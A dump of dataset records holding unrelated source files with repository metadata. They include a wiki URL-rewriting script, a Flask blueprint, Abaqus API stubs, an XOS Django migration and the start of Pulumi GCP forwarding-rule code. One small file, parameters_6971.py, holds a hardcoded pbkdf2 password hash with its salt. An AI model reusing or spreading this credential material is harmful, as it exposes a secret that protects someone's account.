matsujirushi/wiki-documents
|
2e7b72667788c6c22c0768853fb48683027b3a9f
|
[
"MIT"
] | 7
|
2020-11-21T01:36:52.000Z
|
2021-08-13T04:47:03.000Z
|
wiki_url_fix.py
|
matsujirushi/wiki-documents
|
2e7b72667788c6c22c0768853fb48683027b3a9f
|
[
"MIT"
] | 12
|
2020-11-20T16:22:11.000Z
|
2022-01-10T16:39:38.000Z
|
import os
#import requests
#https://github.com/SeeedDocument/wiki_english/raw/master/docs/images/300px-Get_One_Now_Banner-ragular.png
# Static (old, new) URL substitutions, applied verbatim to every line in the
# same order as the original chain of if/replace blocks (order matters: the
# quoted-banner fix must run before the closing `/></a></p>` fix below).
# str.replace is a no-op when `old` is absent, so the original
# `if line.find(old) != -1` guards are unnecessary.
_STATIC_URL_FIXES = [
    ("https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png)\"",
     "https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png"),
    ("https://github.com/SeeedDocument/Wiki_Banner/raw/master/new_product.jpg",
     "https://files.seeedstudio.com/wiki/Wiki_Banner/new_product.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/arduino_logo.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/arduino_logo.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/arduino_logo_n.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/arduino_logo_n.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/raspberry_pi_logo_n.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/raspberry_pi_logo_n.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/raspberry_pi_logo.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/raspberry_pi_logo.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/bbg_logo_n.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/bbg_logo_n.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/bbg_logo.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/bbg_logo.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/wio_logo.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/wio_logo.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/wio_logo_n.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/wio_logo_n.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/linkit_logo_n.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/linkit_logo_n.jpg"),
    ("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/linkit_logo.jpg",
     "https://files.seeedstudio.com/wiki/wiki_english/docs/images/linkit_logo.jpg"),
    ("https://github.com/SeeedDocument/wiki_english/raw/master",
     "https://files.seeedstudio.com/wiki/wiki_english"),
    ("https://raw.githubusercontent.com/SeeedDocument/Seeed-WiKi/master",
     "https://files.seeedstudio.com/wiki/Seeed-WiKi"),
    ("https://raw.githubusercontent.com/SeeedDocument/common/master",
     "https://files.seeedstudio.com/wiki/common"),
    ("https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png /></a></p>",
     "https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png\" /></a></p>"),
]


def _fix_line(line):
    """Apply all URL conversions to a single docs line and return the result."""
    # Dynamic fix 1: github.com/SeeedDocument/<name>/(raw|blob)/master -> files CDN.
    if line.find("https://github.com/SeeedDocument") != -1:
        # +33 skips the matched prefix plus the following '/'
        url = line[line.find("https://github.com/SeeedDocument")+33:]
        if url[:url.find("/master/")][-3:] == "raw":  # repo name is followed by /raw/
            name = url[:url.find("/master/") - 4]
            ddd = "https://github.com/SeeedDocument/" + name + "/raw/master"
        else:                                          # otherwise assume /blob/
            name = url[:url.find("/master/") - 5]
            ddd = "https://github.com/SeeedDocument/" + name + "/blob/master"
        print(line)
        line = line.replace(ddd, "https://files.seeedstudio.com/wiki/" + name)
        print(line)
    # Dynamic fix 2: raw.githubusercontent.com/SeeedDocument/<name>/master -> files CDN.
    if line.find("https://raw.githubusercontent.com/SeeedDocument") != -1:
        # +48 skips the matched prefix plus the following '/'
        url = line[line.find("https://raw.githubusercontent.com/SeeedDocument")+48:]
        name = url[:url.find("/master")]
        print("https://raw.githubusercontent.com/SeeedDocument/" + name + "/master")
        print("https://files.seeedstudio.com/wiki/" + name)
        line = line.replace(
            "https://raw.githubusercontent.com/SeeedDocument/" + name + "/master",
            "https://files.seeedstudio.com/wiki/" + name)
    # Static one-for-one substitutions.
    for old, new in _STATIC_URL_FIXES:
        line = line.replace(old, new)
    return line


def main():
    """Rewrite legacy SeeedDocument GitHub URLs in every docs/*.md file to
    their https://files.seeedstudio.com/wiki/ equivalents, in place.

    A file that raises while being read is reported and left unmodified.
    (This also fixes the original bug where the shared `fin` buffer was not
    cleared on error, leaking a failed file's partially-converted lines into
    the next file's write-back, and the input handle was never closed.)
    """
    for doc_md in os.listdir("docs"):      # list every file under docs/
        if doc_md[-3:] != ".md":           # process Markdown files only
            continue
        path = "docs/" + doc_md
        fixed_lines = []                   # per-file buffer: no cross-file leak
        try:
            with open(path, mode="rt", encoding='UTF-8') as doc:
                for line in doc:
                    fixed_lines.append(_fix_line(line))
        except Exception as err:
            # Best effort, as in the original: report and skip this file.
            print(err)
            continue
        # Write the converted lines back in place.
        with open(path, mode="wt", encoding='UTF-8') as doc:
            doc.writelines(fixed_lines)
        print(doc_md)
# Script entry point: rewrite URLs in all docs/*.md files when run directly.
if __name__ == "__main__":
    main()
| 61.167598
| 163
| 0.520778
| 1,116
| 10,949
| 4.956093
| 0.103047
| 0.053155
| 0.120593
| 0.188754
| 0.841801
| 0.818297
| 0.770024
| 0.720665
| 0.702043
| 0.683602
| 0
| 0.007799
| 0.355923
| 10,949
| 178
| 164
| 61.511236
| 0.776517
| 0.088684
| 0
| 0.295082
| 0
| 0.204918
| 0.453842
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008197
| false
| 0
| 0.008197
| 0
| 0.016393
| 0.04918
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ca40df2e49b21b8d0c7ba108ca7e9fe7461b652e
| 198
|
py
|
Python
|
app/v2/template/__init__.py
|
cds-snc/notifier-api
|
90b385ec49efbaee7e607516fc7d9f08991af813
|
[
"MIT"
] | 41
|
2019-11-28T16:58:41.000Z
|
2022-01-28T21:11:16.000Z
|
app/v2/template/__init__.py
|
cds-snc/notification-api
|
b1c1064f291eb860b494c3fa65ac256ad70bf47c
|
[
"MIT"
] | 1,083
|
2019-07-08T12:57:24.000Z
|
2022-03-08T18:53:40.000Z
|
app/v2/template/__init__.py
|
cds-snc/notifier-api
|
90b385ec49efbaee7e607516fc7d9f08991af813
|
[
"MIT"
] | 9
|
2020-01-24T19:56:43.000Z
|
2022-01-27T21:36:53.000Z
|
from flask import Blueprint
from app.v2.errors import register_errors
# Blueprint for the v2 template endpoints; all routes registered on it are
# served under the /v2/template URL prefix.
v2_template_blueprint = Blueprint("v2_template", __name__, url_prefix="/v2/template")
# Attach the shared v2 error handlers so this blueprint returns the
# standard v2 error responses.
register_errors(v2_template_blueprint)
| 24.75
| 85
| 0.833333
| 27
| 198
| 5.666667
| 0.444444
| 0.261438
| 0.20915
| 0.313725
| 0.431373
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027624
| 0.085859
| 198
| 7
| 86
| 28.285714
| 0.81768
| 0
| 0
| 0
| 0
| 0
| 0.116162
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
ca73aec74d96cb7220316cda3a5db4f006f32ec9
| 5,844
|
py
|
Python
|
src/abaqus/Session/NetworkDatabaseConnector.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/Session/NetworkDatabaseConnector.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/Session/NetworkDatabaseConnector.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
class NetworkDatabaseConnector:
    """The NetworkDatabaseConnector object allows you to access an output database on a remote
    system.

    Attributes
    ----------
    connected: Boolean
        A Boolean specifying if the connection between the client and the server is established.

    Notes
    -----
    This object can be accessed by:

    .. code-block:: python

        session.networkDatabaseConnectors[name]
    """

    # A Boolean specifying if the connection between the client and the server is established.
    connected: Boolean = OFF

    def __init__(self, name: str, hostName: str, directory: str, remoteAbaqusDriverName: str = '',
                 remoteLoginMechanism: SymbolicConstant = SSH, sshPath: str = '', serverPort: int = 0,
                 connectionPort: int = 0, serverTimeout: int = 86400,
                 allowAutomaticStartup: Boolean = ON):
        """This method creates a NetworkDatabaseConnector object that you can use to access a
        remote output database. You can create a network database connector from any platform:
        Windows or Linux. However, the network database connector server must reside on a Linux
        platform; you cannot access an output database that resides on a remote Windows system.
        You can access only a remote output database; you cannot access a remote model database.

        Notes
        -----
        This function can be accessed by:

        .. code-block:: python

            session.NetworkDatabaseConnector

        Parameters
        ----------
        name
            A String specifying the repository key.
        hostName
            A String specifying the name of the remote computer.
        directory
            A String specifying the directory on the remote computer.
        remoteAbaqusDriverName
            A String specifying the name of command to execute Abaqus/CAE on the remote computer.
        remoteLoginMechanism
            A SymbolicConstant specifying the remote shell command on the local system. Possible
            values are RSH and SSH. The default value is SSH.
        sshPath
            A String specifying the path to the`ssh` command on the local system. The default value
            is an empty string.
        serverPort
            An Int specifying the server port on the remote computer. If *serverPort* =0, the host
            and remote systems are allowed to establish their own port numbers. The default value is
            0.
        connectionPort
            An Int specifying the connection port on the remote computer. The default value is 0.
        serverTimeout
            An Int specifying the timeout in seconds for the remote server. For example: 86400
            corresponds to one day. The server exits if it does not receive any communication from
            the client during the time specified. The default value is 86400.
        allowAutomaticStartup
            A Boolean specifying whether to start the remote network database connector server. The
            default value is ON.

        Returns
        -------
        A NetworkDatabaseConnector object.
        """
        # Stub: the real implementation is supplied by Abaqus/CAE at runtime.
        pass

    def start(self, serverPort: int = 0, serverTimeout: int = 86400):
        """This method starts the remote network database connector server on the remote host.

        Parameters
        ----------
        serverPort
            An Int specifying the server port on the remote computer. If *serverPort* =0, the host
            and remote systems are allowed to establish their own port numbers. The default value is
            0.
        serverTimeout
            An Int specifying the timeout in seconds for the remote server. For example: 86400
            corresponds to one day. The server exits if it does not receive any communication from
            the client during the time specified. The default value is 86400.
        """
        # Stub: the real implementation is supplied by Abaqus/CAE at runtime.
        pass

    def stop(self):
        """This method stops the remote network database connector server on the remote host.
        """
        # Stub: the real implementation is supplied by Abaqus/CAE at runtime.
        pass

    def setValues(self, remoteAbaqusDriverName: str = '', remoteLoginMechanism: SymbolicConstant = SSH,
                  sshPath: str = '', serverPort: int = 0, connectionPort: int = 0,
                  serverTimeout: int = 86400, allowAutomaticStartup: Boolean = ON):
        """This method modifies the NetworkDatabaseConnector object.

        Parameters
        ----------
        remoteAbaqusDriverName
            A String specifying the name of command to execute Abaqus/CAE on the remote computer.
        remoteLoginMechanism
            A SymbolicConstant specifying the remote shell command on the local system. Possible
            values are RSH and SSH. The default value is SSH.
        sshPath
            A String specifying the path to the`ssh` command on the local system. The default value
            is an empty string.
        serverPort
            An Int specifying the server port on the remote computer. If *serverPort* =0, the host
            and remote systems are allowed to establish their own port numbers. The default value is
            0.
        connectionPort
            An Int specifying the connection port on the remote computer. The default value is 0.
        serverTimeout
            An Int specifying the timeout in seconds for the remote server. For example: 86400
            corresponds to one day. The server exits if it does not receive any communication from
            the client during the time specified. The default value is 86400.
        allowAutomaticStartup
            A Boolean specifying whether to start the remote network database connector server. The
            default value is ON.
        """
        # Stub: the real implementation is supplied by Abaqus/CAE at runtime.
        pass
| 44.610687
| 103
| 0.646475
| 686
| 5,844
| 5.501458
| 0.196793
| 0.047695
| 0.055644
| 0.063063
| 0.753577
| 0.734234
| 0.727345
| 0.727345
| 0.707737
| 0.707737
| 0
| 0.014353
| 0.308522
| 5,844
| 130
| 104
| 44.953846
| 0.919574
| 0.726215
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.0625
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
04840afb31e795889ef11912484801b91e8841a8
| 40,005
|
py
|
Python
|
xos/core/migrations/0003_auto_20190304_1358.py
|
mary-grace/xos
|
3e269834d29f936757f5091183c9b5188ed5cb9e
|
[
"Apache-2.0"
] | 66
|
2015-01-29T20:56:45.000Z
|
2021-07-01T09:56:44.000Z
|
xos/core/migrations/0003_auto_20190304_1358.py
|
mary-grace/xos
|
3e269834d29f936757f5091183c9b5188ed5cb9e
|
[
"Apache-2.0"
] | 112
|
2015-01-30T19:59:09.000Z
|
2017-04-08T16:43:40.000Z
|
xos/core/migrations/0003_auto_20190304_1358.py
|
mary-grace/xos
|
3e269834d29f936757f5091183c9b5188ed5cb9e
|
[
"Apache-2.0"
] | 66
|
2015-02-09T17:35:36.000Z
|
2021-03-24T12:31:19.000Z
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-03-04 18:58
from __future__ import unicode_literals
import core.models.xosbase_header
from django.db import migrations, models
import django.utils.timezone
# --- Shared field factories -------------------------------------------------
# Every model in this migration gets the same three altered fields; each
# factory returns a FRESH field instance so no two AlterField operations
# share a field object. The b'...' byte literals mirror the Python-2-era
# output of Django 1.11's makemigrations and must not be changed.

def _backend_status():
    return models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024)


def _leaf_model_name():
    return models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024)


def _updated():
    return models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer')


# Per-model fields beyond the three shared ones. Values are zero-argument
# factories, matching the shared-field helpers above.
_EXTRA_FIELDS = {
    'addresspool_decl': {
        'cidr': lambda: models.CharField(blank=True, help_text=b'Subnet for this AddressPool', max_length=32),
        'gateway_ip': lambda: models.CharField(blank=True, help_text=b'Gateway IP address for this AddressPool', max_length=32),
        'gateway_mac': lambda: models.CharField(blank=True, help_text=b'Gateway MAC address for this AddressPool', max_length=32),
    },
    'flavor_decl': {
        'flavor': lambda: core.models.xosbase_header.StrippedCharField(blank=True, help_text=b'flavor string used to configure deployments', max_length=32),
    },
    'privilege_decl': {
        'expires': lambda: models.DateTimeField(blank=True, max_length=1024, null=True),
        'permission': lambda: models.CharField(blank=True, default=b'all', max_length=1024),
    },
    'servicedependency_decl': {
        'connect_method': lambda: models.CharField(blank=True, choices=[(b'none', b'None'), (b'private', b'Private'), (b'public', b'Public')], default=b'none', help_text=b'method to connect the two services', max_length=30),
    },
    'servicegraphconstraint_decl': {
        'constraints': lambda: core.models.xosbase_header.StrippedCharField(blank=True, help_text=b'A composite array defining positions, eg [volt, vsg, [address_manager, vrouter]]', max_length=1024),
    },
    'slice_decl': {
        'controller_replica_count': lambda: models.IntegerField(blank=True, default=0, help_text=b'Replica count, controller-dependent', null=True),
    },
}

# Models in the order makemigrations originally emitted them.
_MODELS = (
    'addresspool_decl',
    'controller_decl',
    'controllerimages_decl',
    'controllernetwork_decl',
    'controllerrole_decl',
    'controllersite_decl',
    'controllersiteprivilege_decl',
    'controllerslice_decl',
    'controllersliceprivilege_decl',
    'controlleruser_decl',
    'deployment_decl',
    'flavor_decl',
    'image_decl',
    'imagedeployments_decl',
    'instance_decl',
    'interfacetype_decl',
    'network_decl',
    'networkparameter_decl',
    'networkparametertype_decl',
    'networkslice_decl',
    'networktemplate_decl',
    'node_decl',
    'nodelabel_decl',
    'port_decl',
    'principal_decl',
    'privilege_decl',
    'role_decl',
    'service_decl',
    'serviceattribute_decl',
    'servicedependency_decl',
    'servicegraphconstraint_decl',
    'serviceinstance_decl',
    'serviceinstanceattribute_decl',
    'serviceinstancelink_decl',
    'serviceinterface_decl',
    'serviceport_decl',
    'site_decl',
    'sitedeployment_decl',
    'siteprivilege_decl',
    'siterole_decl',
    'slice_decl',
    'sliceprivilege_decl',
    'slicerole_decl',
    'tag_decl',
    'trustdomain_decl',
    'xoscore_decl',
    'xosguiextension_decl',
)


def _operations():
    """Expand the model/field tables above into AlterField operations.

    Within each model the fields are sorted alphabetically by name, which
    reproduces exactly the order makemigrations generated (the shared
    fields and every per-model extra interleave alphabetically).
    """
    ops = []
    for model_name in _MODELS:
        factories = {
            'backend_status': _backend_status,
            'leaf_model_name': _leaf_model_name,
            'updated': _updated,
        }
        factories.update(_EXTRA_FIELDS.get(model_name, {}))
        for field_name in sorted(factories):
            ops.append(
                migrations.AlterField(
                    model_name=model_name,
                    name=field_name,
                    field=factories[field_name](),
                )
            )
    return ops


class Migration(migrations.Migration):
    """Alter common bookkeeping fields (plus a few model-specific ones)
    across all *_decl core models — generated by Django 1.11.11."""

    dependencies = [
        ('core', '0002_initial_data'),
    ]

    operations = _operations()
| 51.157289
| 208
| 0.647694
| 4,514
| 40,005
| 5.59393
| 0.048294
| 0.070215
| 0.148509
| 0.17227
| 0.956754
| 0.954299
| 0.953665
| 0.921785
| 0.92028
| 0.916716
| 0
| 0.014363
| 0.253393
| 40,005
| 781
| 209
| 51.222791
| 0.831057
| 0.015923
| 0
| 0.963158
| 0
| 0
| 0.318332
| 0.025564
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005263
| 0
| 0.009211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8e2de31245112265071ddb48b3a3643ca28e9270
| 54
|
py
|
Python
|
src/thexb/TOOL_tree_viewer_input_stats.py
|
harris-2374/THEx
|
04c4f56eb2cf86b8f55ddd6edd3f48029296bf5a
|
[
"MIT"
] | null | null | null |
src/thexb/TOOL_tree_viewer_input_stats.py
|
harris-2374/THEx
|
04c4f56eb2cf86b8f55ddd6edd3f48029296bf5a
|
[
"MIT"
] | null | null | null |
src/thexb/TOOL_tree_viewer_input_stats.py
|
harris-2374/THEx
|
04c4f56eb2cf86b8f55ddd6edd3f48029296bf5a
|
[
"MIT"
] | null | null | null |
import pandas as pd
def tv_input_stats():
return
| 10.8
| 21
| 0.722222
| 9
| 54
| 4.111111
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 54
| 5
| 22
| 10.8
| 0.880952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
6d2a9234a529ae8e91c8e2f16708dcdf05792d05
| 93
|
py
|
Python
|
squirrel_maze/_entrypoints.py
|
princeodd47/squirrel-maze
|
4abca698ba7b11aa0fd239c49e63a7bc90bd9dfe
|
[
"MIT"
] | 1
|
2021-05-27T01:23:51.000Z
|
2021-05-27T01:23:51.000Z
|
squirrel_maze/_entrypoints.py
|
princeodd47/squirrel-maze
|
4abca698ba7b11aa0fd239c49e63a7bc90bd9dfe
|
[
"MIT"
] | 2
|
2019-03-30T20:18:43.000Z
|
2021-06-28T02:38:03.000Z
|
squirrel_maze/_entrypoints.py
|
princeodd47/squirrel-maze
|
4abca698ba7b11aa0fd239c49e63a7bc90bd9dfe
|
[
"MIT"
] | 1
|
2019-03-28T12:40:34.000Z
|
2019-03-28T12:40:34.000Z
|
from squirrel_maze.resources import menus as sm_menus
def main():
sm_menus.main_menu()
| 15.5
| 53
| 0.763441
| 15
| 93
| 4.466667
| 0.733333
| 0.208955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 93
| 5
| 54
| 18.6
| 0.858974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
edf0f03a6decfc9aca4649fb4cde290763565fb0
| 92
|
py
|
Python
|
parameters_6971.py
|
hooshingschaefer/webapps
|
f812fc6eaec4d9620e660e33af473539c3f33c31
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_6971.py
|
hooshingschaefer/webapps
|
f812fc6eaec4d9620e660e33af473539c3f33c31
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_6971.py
|
hooshingschaefer/webapps
|
f812fc6eaec4d9620e660e33af473539c3f33c31
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$98df120a24be5267$7a0b5fe97099e874d672f94f998dc747120df93b"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.527473
| 0.01087
| 92
| 1
| 92
| 92
| 0.373626
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
61035162f9b1243cd6b054a1b38169bbdccf9c05
| 116
|
py
|
Python
|
test_numericalunits.py
|
pulkin/numericalunits
|
7661d759e2b3924e504ed9d9054d756b9a7b51ec
|
[
"MIT"
] | null | null | null |
test_numericalunits.py
|
pulkin/numericalunits
|
7661d759e2b3924e504ed9d9054d756b9a7b51ec
|
[
"MIT"
] | null | null | null |
test_numericalunits.py
|
pulkin/numericalunits
|
7661d759e2b3924e504ed9d9054d756b9a7b51ec
|
[
"MIT"
] | null | null | null |
from numericalunits import eval, kg, m, s
assert eval("kg") == kg
assert eval("kg * m / s ** 2") == kg * m / s ** 2
| 29
| 49
| 0.568966
| 21
| 116
| 3.142857
| 0.428571
| 0.272727
| 0.181818
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0.232759
| 116
| 3
| 50
| 38.666667
| 0.719101
| 0
| 0
| 0
| 0
| 0
| 0.146552
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
612993ed5d83d1c04f7adbc3323c5fc883ce5bfe
| 98,684
|
py
|
Python
|
sdk/python/pulumi_gcp/compute/global_forwarding_rule.py
|
la3mmchen/pulumi-gcp
|
0e3c6fecd062dff78a4fd95b7ebd5ce4492ad1ea
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/compute/global_forwarding_rule.py
|
la3mmchen/pulumi-gcp
|
0e3c6fecd062dff78a4fd95b7ebd5ce4492ad1ea
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/compute/global_forwarding_rule.py
|
la3mmchen/pulumi-gcp
|
0e3c6fecd062dff78a4fd95b7ebd5ce4492ad1ea
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['GlobalForwardingRuleArgs', 'GlobalForwardingRule']
@pulumi.input_type
class GlobalForwardingRuleArgs:
def __init__(__self__, *,
target: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
ip_protocol: Optional[pulumi.Input[str]] = None,
ip_version: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
load_balancing_scheme: Optional[pulumi.Input[str]] = None,
metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
port_range: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a GlobalForwardingRule resource.
:param pulumi.Input[str] target: The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input[str] ip_address: The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
:param pulumi.Input[str] ip_version: The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this forwarding rule. A list of key->value pairs.
:param pulumi.Input[str] load_balancing_scheme: This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
